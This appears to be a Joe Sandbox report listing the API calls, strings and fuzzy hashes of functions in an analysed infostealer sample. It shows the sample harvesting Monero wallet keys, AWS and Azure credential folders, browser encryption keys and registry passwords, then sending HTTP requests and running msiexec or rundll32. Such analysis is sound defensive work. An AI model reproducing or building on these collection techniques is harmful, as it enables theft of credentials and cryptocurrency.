                                          • lstrcat.KERNEL32(?,00EB1490), ref: 00E9D2E3
                                            • Part of subcall function 00EAA820: lstrlen.KERNEL32(00E94F05,?,?,00E94F05,00EB0DDE), ref: 00EAA82B
                                            • Part of subcall function 00EAA820: lstrcpy.KERNEL32(00EB0DDE,00000000), ref: 00EAA885
                                          • lstrlen.KERNEL32(?), ref: 00E9D32A
                                          • lstrlen.KERNEL32(?), ref: 00E9D339
                                            • Part of subcall function 00EAAA70: StrCmpCA.SHLWAPI(00BB8B58,00E9A7A7,?,00E9A7A7,00BB8B58), ref: 00EAAA8F
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9D3B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                          • String ID:
                                          • API String ID: 1956182324-0
                                          • Opcode ID: 62c7983da421d13cfa5a208e91c82bd627ece744bdd5207b73cbd4b6003487b6
                                          • Instruction ID: 6c830e9d6a9985e249e0b2e52e4ca6fc7a98a01fc9685541bad77c861fc55851
                                          • Opcode Fuzzy Hash: 62c7983da421d13cfa5a208e91c82bd627ece744bdd5207b73cbd4b6003487b6
                                          • Instruction Fuzzy Hash: 7BE11F72910204EBCB58EBA0DD96EEE73B8AF59301F145168F507BB091DF39BA05CB61
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00BBDEC8,00000000,?,00EB144C,00000000,?,?), ref: 00E9CA6C
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E9CA89
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00E9CA95
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E9CAA8
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E9CAD9
                                          • StrStrA.SHLWAPI(?,00BBDF10,00EB0B52), ref: 00E9CAF7
                                          • StrStrA.SHLWAPI(00000000,00BBDE08), ref: 00E9CB1E
                                          • StrStrA.SHLWAPI(?,00BBE4E8,00000000,?,00EB1458,00000000,?,00000000,00000000,?,00BB8AD8,00000000,?,00EB1454,00000000,?), ref: 00E9CCA2
                                          • StrStrA.SHLWAPI(00000000,00BBE648), ref: 00E9CCB9
                                            • Part of subcall function 00E9C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E9C871
                                            • Part of subcall function 00E9C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E9C87C
                                          • StrStrA.SHLWAPI(?,00BBE648,00000000,?,00EB145C,00000000,?,00000000,00BB8B18), ref: 00E9CD5A
                                          • StrStrA.SHLWAPI(00000000,00BB88A8), ref: 00E9CD71
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B46), ref: 00E9C943
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B47), ref: 00E9C957
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B4E), ref: 00E9C978
                                          • lstrlen.KERNEL32(00000000), ref: 00E9CE44
                                          • CloseHandle.KERNEL32(00000000), ref: 00E9CE9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                          • String ID:
                                          • API String ID: 3744635739-3916222277
                                          • Opcode ID: 70f6d5cfe53ab015d184f8a60b7d619dcfab6458f22f8bf1a25962cdaa8c68cd
                                          • Instruction ID: cfa663511143aae0db7ec8e37ce39eb503b77e1555b960cb145fd3661109f589
                                          • Opcode Fuzzy Hash: 70f6d5cfe53ab015d184f8a60b7d619dcfab6458f22f8bf1a25962cdaa8c68cd
                                          • Instruction Fuzzy Hash: 6BE14F72900208ABCB58EBA0DC95FEEB7B8AF59300F455169F5077B091DF347A4ACB61
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • RegOpenKeyExA.ADVAPI32(00000000,00BBBC50,00000000,00020019,00000000,00EB05B6), ref: 00EA83A4
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EA8426
                                          • wsprintfA.USER32 ref: 00EA8459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EA847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8499
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3246050789-3278919252
                                          • Opcode ID: 32b64345bb0c1fd5161e67200d2cd75752a3c8b1f9705c9f797cae6016abbb78
                                          • Instruction ID: 139cbea33df696cff62d513b12b65c5b63234133c1e499baf8e614dfc433f7e1
                                          • Opcode Fuzzy Hash: 32b64345bb0c1fd5161e67200d2cd75752a3c8b1f9705c9f797cae6016abbb78
                                          • Instruction Fuzzy Hash: 48811C71911218DBEB68DF50CD95FEA77B8BF48700F009299E50AAA140DF757B85CF90
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4DB0
                                          • lstrcat.KERNEL32(?,\.azure\), ref: 00EA4DCD
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA492C
                                            • Part of subcall function 00EA4910: FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4E3C
                                          • lstrcat.KERNEL32(?,\.aws\), ref: 00EA4E59
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                            • Part of subcall function 00EA4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                            • Part of subcall function 00EA4910: FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4EC8
                                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EA4EE5
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA49B0
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB08D2), ref: 00EA49C5
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA49E2
                                            • Part of subcall function 00EA4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EA4A1E
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00BBFBA0), ref: 00EA4A4A
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00EB0FF8), ref: 00EA4A5C
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,?), ref: 00EA4A70
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00EB0FFC), ref: 00EA4A82
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,?), ref: 00EA4A96
                                            • Part of subcall function 00EA4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EA4AAC
                                            • Part of subcall function 00EA4910: DeleteFileA.KERNEL32(?), ref: 00EA4B31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                          • API String ID: 949356159-974132213
                                          • Opcode ID: 6534b1b3c12c2ac09ff5dcc27dd8164927d5c55d4e35af9fd8ab11f3d5bf8f51
                                          • Instruction ID: 8f694e8d47dea86087c9034a1010e361ecc6de81e1738a035318ffdd3a769b8d
                                          • Opcode Fuzzy Hash: 6534b1b3c12c2ac09ff5dcc27dd8164927d5c55d4e35af9fd8ab11f3d5bf8f51
                                          • Instruction Fuzzy Hash: 534194BAA4030867CB64F760EC57FEE3378AB65700F405894B585760C1EEB567C9CB92
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA906C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID: image/jpeg
                                          • API String ID: 2244384528-3785015651
                                          • Opcode ID: 445d9058713dfd5f3ef362ec6a54d06fe0eaa80494b06d793f2c9d6b839bb11e
                                          • Instruction ID: 300ca566efd0ae643afc2c99a1398fc034b57c43970d9829f89da50506f36603
                                          • Opcode Fuzzy Hash: 445d9058713dfd5f3ef362ec6a54d06fe0eaa80494b06d793f2c9d6b839bb11e
                                          • Instruction Fuzzy Hash: FE71DF75A10208EBDB14DFE4D989FEEB7B9BF4C700F108508F955AB284DB79A905CB60
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA31C5
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA335D
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA34EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell$lstrcpy
                                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                          • API String ID: 2507796910-3625054190
                                          • Opcode ID: 92a1b0dfa8ed13b321c40c3f208561db569c592d4388f4ff894d33110698f8fc
                                          • Instruction ID: 5ab9ac8846a8c08a47990d739bc8b203d2479e2a0513e81dcd93ec3813753c48
                                          • Opcode Fuzzy Hash: 92a1b0dfa8ed13b321c40c3f208561db569c592d4388f4ff894d33110698f8fc
                                          • Instruction Fuzzy Hash: 19122F719002089ADB59EFA0DC96FEEB7B8AF59300F445169F5067A091EF343B4ACF61
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E96280: InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                            • Part of subcall function 00E96280: StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                            • Part of subcall function 00E96280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                            • Part of subcall function 00E96280: HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                            • Part of subcall function 00E96280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                            • Part of subcall function 00E96280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5318
                                          • lstrlen.KERNEL32(00000000), ref: 00EA532F
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00EA5364
                                          • lstrlen.KERNEL32(00000000), ref: 00EA5383
                                          • lstrlen.KERNEL32(00000000), ref: 00EA53AE
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 3240024479-1526165396
                                          • Opcode ID: cd52197dbe0cc4e4577b49ba92b521003e6c3e86f41ace33beefca9db683a4cf
                                          • Instruction ID: 72a71025c38c6434a771e5e3beaf8cbb1a6c7cc5c85c339773bcacc94c00fb93
                                          • Opcode Fuzzy Hash: cd52197dbe0cc4e4577b49ba92b521003e6c3e86f41ace33beefca9db683a4cf
                                          • Instruction Fuzzy Hash: 3F511C319102089BCB58FF60C996AEE77B8AF1A301F555028F8077E191DF387B45CBA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2001356338-0
                                          • Opcode ID: eafd3ba3ffa53dae67d53f66851101842d85128436e8f5334b663f0a1f3f0c72
                                          • Instruction ID: c02c6826da0fd3de97278d16cb887dd7aaf3d6010eb54eea365896c6768ff544
                                          • Opcode Fuzzy Hash: eafd3ba3ffa53dae67d53f66851101842d85128436e8f5334b663f0a1f3f0c72
                                          • Instruction Fuzzy Hash: 81C1A4B5A002099BCB14EF60DC89FEA73B8BB59304F0455D8F50ABB141EB35BA85CF91
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA42EC
                                          • lstrcat.KERNEL32(?,00BBF608), ref: 00EA430B
                                          • lstrcat.KERNEL32(?,?), ref: 00EA431F
                                          • lstrcat.KERNEL32(?,00BBDEE0), ref: 00EA4333
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8D90: GetFileAttributesA.KERNEL32(00000000,?,00E91B54,?,?,00EB564C,?,?,00EB0E1F), ref: 00EA8D9F
                                            • Part of subcall function 00E99CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E99D39
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA93C0: GlobalAlloc.KERNEL32(00000000,00EA43DD,00EA43DD), ref: 00EA93D3
                                          • StrStrA.SHLWAPI(?,00BBF788), ref: 00EA43F3
                                          • GlobalFree.KERNEL32(?), ref: 00EA4512
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                            • Part of subcall function 00E99AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                            • Part of subcall function 00E99AC0: LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA44A3
                                          • StrCmpCA.SHLWAPI(?,00EB08D1), ref: 00EA44C0
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00EA44D2
                                          • lstrcat.KERNEL32(00000000,?), ref: 00EA44E5
                                          • lstrcat.KERNEL32(00000000,00EB0FB8), ref: 00EA44F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 3541710228-0
                                          • Opcode ID: d2de239f4ea5d91751d5e2beaadefe97e65cfbf33b8c148508d1b012c4aff37a
                                          • Instruction ID: 88f16d77bf0290e8249e01abe63488fa15dbbe57f3d910e29f4754754a9c6e84
                                          • Opcode Fuzzy Hash: d2de239f4ea5d91751d5e2beaadefe97e65cfbf33b8c148508d1b012c4aff37a
                                          • Instruction Fuzzy Hash: E4714AB6E00208A7CB14EBE4DC46FEE73B9AB8D300F045598F505A7185EB75EB45CB51
                                          APIs
                                            • Part of subcall function 00E912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E912B4
                                            • Part of subcall function 00E912A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E912BB
                                            • Part of subcall function 00E912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E912D7
                                            • Part of subcall function 00E912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E912F5
                                            • Part of subcall function 00E912A0: RegCloseKey.ADVAPI32(?), ref: 00E912FF
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9134F
                                          • lstrlen.KERNEL32(?), ref: 00E9135C
                                          • lstrcat.KERNEL32(?,.keys), ref: 00E91377
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E91465
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E914EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                          • API String ID: 3478931302-218353709
                                          • Opcode ID: e1769148ce559a93aa790dd6b0d68420c7af2cc000cf7c377e62cad13e9284ce
                                          • Instruction ID: 7c66e8415135674d910a4e44a33ad7ab567f9f76a0328108db7d5499c1690e60
                                          • Opcode Fuzzy Hash: e1769148ce559a93aa790dd6b0d68420c7af2cc000cf7c377e62cad13e9284ce
                                          • Instruction Fuzzy Hash: 485187B1D0021997CB54FB60DC96BEE73BCAF54300F4451E8B60A76082EF346B45CBA5
                                          APIs
                                            • Part of subcall function 00E972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E9733A
                                            • Part of subcall function 00E972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E973B1
                                            • Part of subcall function 00E972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E9740D
                                            • Part of subcall function 00E972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E97452
                                            • Part of subcall function 00E972D0: HeapFree.KERNEL32(00000000), ref: 00E97459
                                          • lstrcat.KERNEL32(00000000,00EB17FC), ref: 00E97606
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E97648
                                          • lstrcat.KERNEL32(00000000, : ), ref: 00E9765A
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E9768F
                                          • lstrcat.KERNEL32(00000000,00EB1804), ref: 00E976A0
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E976D3
